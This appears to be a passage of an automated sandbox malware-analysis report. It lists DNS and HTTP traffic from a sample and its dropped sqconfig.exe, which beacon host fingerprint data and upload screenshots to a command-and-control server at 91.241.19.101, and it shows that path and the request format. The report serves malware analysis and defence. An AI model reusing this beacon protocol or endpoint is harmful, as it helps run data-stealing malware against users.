                                                                  Sep 30, 2021 23:53:02.802313089 CEST53536158.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:53:02.853374004 CEST53507288.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:53:02.910552979 CEST5377753192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:53:02.998545885 CEST53537778.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:53:03.169825077 CEST5710653192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:53:03.247246981 CEST53571068.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:53:04.449754000 CEST6035253192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:53:04.528734922 CEST53603528.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:53:07.540410042 CEST5677353192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:53:07.612222910 CEST53567738.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:53:08.394819021 CEST6098253192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:53:08.480654955 CEST53609828.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:53:10.006454945 CEST5805853192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:53:10.035409927 CEST6436753192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:53:10.087991953 CEST53580588.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:53:10.111511946 CEST53643678.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:53:21.239579916 CEST5153953192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:53:21.336815119 CEST53515398.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:53:37.701073885 CEST5539353192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:53:37.800062895 CEST53553938.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:53:55.642224073 CEST5058553192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:53:55.720861912 CEST53505858.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:54:23.269826889 CEST6345653192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:54:23.350857019 CEST53634568.8.8.8192.168.2.3

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Sep 30, 2021 23:52:25.942468882 CEST192.168.2.38.8.8.80x77dbStandard query (0)a.pomf.catA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Sep 30, 2021 23:52:26.027472973 CEST8.8.8.8192.168.2.30x77dbNo error (0)a.pomf.cat69.39.225.3A (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • a.pomf.cat
                                                                  • 91.241.19.101

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.34975669.39.225.3443C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  169.39.225.3443192.168.2.349756C:\Users\user\Desktop\Ac372JNTO6.exe
                                                                  TimestampkBytes transferredDirectionData


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  10192.168.2.34976991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:52.373054981 CEST7326OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----a925bc230fdbeec72a266ea97d6eb24e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86299
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:52:52.373152971 CEST7326OUTData Raw: 2d 2d 2d 2d 2d 2d 61 39 32 35 62 63 32 33 30 66 64 62 65 65 63 37 32 61 32 36 36 65 61 39 37 64 36 65 62 32 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------a925bc230fdbeec72a266ea97d6eb24eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:52:52.373342037 CEST7336OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:52:52.373425007 CEST7339OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:52:52.496862888 CEST7342OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:52:52.496927023 CEST7345OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:52:52.497126102 CEST7358OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:52:52.497256994 CEST7364OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:52:52.624742031 CEST7370OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:52:52.624798059 CEST7375OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:52:52.624851942 CEST7391OUTData Raw: 2a 9b 69 04 09 3c 20 05 67 42 37 64 ee 63 b4 e4 b1 f5 aa da 46 a5 a4 69 5e 19 d2 f5 66 3a 94 29 67 ae cf 3d a5 b4 7b 25 69 48 86 12 12 49 72 9b 54 f0 09 08 78 27 8a 9f 6c ed 7f eb 57 61 fb 25 7f eb a2 b9 ca ae 8b aa b6 96 75 55 d2 ef 8e 9c 01 26
                                                                  Data Ascii: *i< gB7dcFi^f:)g={%iHIrTx'lWa%uU&[^I'gnSf%aH[V3_n].D%e%p7)Qb:~v'hbe96F<|goN)y+_ok_Gcy4C.Qbb/<#5.
                                                                  Sep 30, 2021 23:52:52.829370975 CEST7413INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:52 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  100192.168.2.34991591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:23.620063066 CEST15910OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:23.814897060 CEST15924INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:23 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  101192.168.2.34991791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:23.689662933 CEST15911OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:23.697555065 CEST15911OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:23.697793007 CEST15921OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:23.697876930 CEST15924OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:23.823977947 CEST15937OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:23.824037075 CEST15943OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:23.824047089 CEST15944OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:53:23.824054956 CEST15946OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:23.824075937 CEST15950OUTData Raw: c7 87 18 ff 00 d3 33 5e 2f 7e df be 73 fe d1 af 3b 28 5e f4 cf 7b 39 77 f6 7e 87 a1 59 71 f0 ee 0f a8 fe 75 cc c9 5d 25 a1 c7 c3 bb 6f 73 fd 6b 97 95 c8 27 da b4 c2 2f 7a 7e ac e4 cc dd 94 3d 11 13 92 0f 06 90 4b 20 e8 e4 7e 34 84 e6 9b 5e 8d 91
                                                                  Data Ascii: 3^/~s;(^{9w~Yqu]%osk'/z~=K ~4^;NrgOXoE.Hu,i'AMkI>bq+[2wqVE~5lCT<GsMu5XO-&<Jii-iD'kg/TF5W+9+zO7:&r#
                                                                  Sep 30, 2021 23:53:23.950385094 CEST15961OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:23.950459957 CEST15969OUTData Raw: 2a 9b 69 04 09 3c 20 05 67 42 37 64 ee 63 b4 e4 b1 f5 aa da 46 a5 a4 69 5e 19 d2 f5 66 3a 94 29 67 ae cf 3d a5 b4 7b 25 69 48 86 12 12 49 72 9b 54 f0 09 08 78 27 8a 9f 6c ed 7f eb 57 61 fb 25 7f eb a2 b9 ca ae 8b aa b6 96 75 55 d2 ef 8e 9c 01 26
                                                                  Data Ascii: *i< gB7dcFi^f:)g={%iHIrTx'lWa%uU&[^I'gnSf%aH[V3_n].D%e%p7)Qb:~v'hbe96F<|goN)y+_ok_Gcy4C.Qbb/<#5.
                                                                  Sep 30, 2021 23:53:24.150228977 CEST16001INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:24 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  102192.168.2.34991891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:24.311203003 CEST16001OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:24.494352102 CEST16002INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:24 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:53:25.538906097 CEST16006OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:25.539012909 CEST16006OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:25.539160013 CEST16016OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:25.539280891 CEST16019OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:25.679584980 CEST16022OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:25.679702044 CEST16041OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:25.679748058 CEST16043OUTData Raw: c7 87 18 ff 00 d3 33 5e 2f 7e df be 73 fe d1 af 3b 28 5e f4 cf 7b 39 77 f6 7e 87 a1 59 71 f0 ee 0f a8 fe 75 cc c9 5d 25 a1 c7 c3 bb 6f 73 fd 6b 97 95 c8 27 da b4 c2 2f 7a 7e ac e4 cc dd 94 3d 11 13 92 0f 06 90 4b 20 e8 e4 7e 34 84 e6 9b 5e 8d 91
                                                                  Data Ascii: 3^/~s;(^{9w~Yqu]%osk'/z~=K ~4^;NrgOXoE.Hu,i'AMkI>bq+[2wqVE~5lCT<GsMu5XO-&<Jii-iD'kg/TF5W+9+zO7:&r#
                                                                  Sep 30, 2021 23:53:25.679769993 CEST16046OUTData Raw: 1b b9 5f ba 43 55 77 d1 2f 13 fe 59 67 e9 54 b1 34 de cc 87 82 ad 1d d1 98 bd 71 4f c5 59 6d 3e e1 3a c2 c3 f0 a6 18 64 1d 50 8f c2 ab da 45 ec c5 ec 66 b7 44 60 66 a4 14 6d 22 94 0c d1 72 94 5a 1d 4a 29 31 4e 02 a6 e5 0a 29 d4 80 52 81 52 cb 48
                                                                  Data Ascii: _CUw/YgT4qOYm>:dPEfD`fm"rZJ)1N)RRHP)S@Z|A?.kA?/O?:{?KIid<#a{xV@X9w* ^o""g_03L#1'$9$5utf-Y4QLQ`y |+,|Av
                                                                  Sep 30, 2021 23:53:25.815691948 CEST16058OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:53:25.815742016 CEST16069OUTData Raw: 4d 14 e1 40 98 ea 29 33 4a 29 92 3a 8a 43 45 02 62 d1 45 28 a0 46 c7 87 bf e3 fd bf eb 99 aa 6d f7 db eb 56 f4 0f f8 fe 6f fa e6 6a a3 7d f6 fa 9a c2 3f c5 63 a9 fc 34 25 2d 1d a8 15 b9 ce 2d 3a 9b 4e a4 48 53 a9 05 2d 4b 10 a2 8a 4a 5a 09 0a 28
                                                                  Data Ascii: M@)3J):CEbE(FmVoj}?c4%--:NHS-KJZ(F(bG47(BV>F8I{NgnTK%?,=yKoWDY[[_;>kq{st^*t$gBfKSi4\p4
                                                                  Sep 30, 2021 23:53:25.815761089 CEST16082OUTData Raw: f1 fa e0 c4 e6 34 b0 f2 e5 9a 7f 2b 7f 99 bd 2c 2c ea ab a6 8f 9c 29 45 7d 20 bf 0b bc 18 7a e8 df f9 35 37 ff 00 17 5c ff 00 8f fe 1f f8 5f 44 f0 3e a3 a8 e9 da 67 91 77 0f 97 b2 4f b4 4a d8 cc 8a a7 86 62 3a 13 59 52 ce 28 54 9a 82 4e ed db a7
                                                                  Data Ascii: 4+,,)E} z57\_D>gwOJb:YR(TN<HQ)Ez RRQEb4G{+ff-NV?+#yFkCLM2YarAi]t(~nZ_VQ\k&TZWGRR-bJi))J:!
                                                                  Sep 30, 2021 23:53:25.995950937 CEST16095INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:25 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  103192.168.2.34992291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:25.745213985 CEST16046OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:25.935173988 CEST16094INHTTP/1.1 200 OK
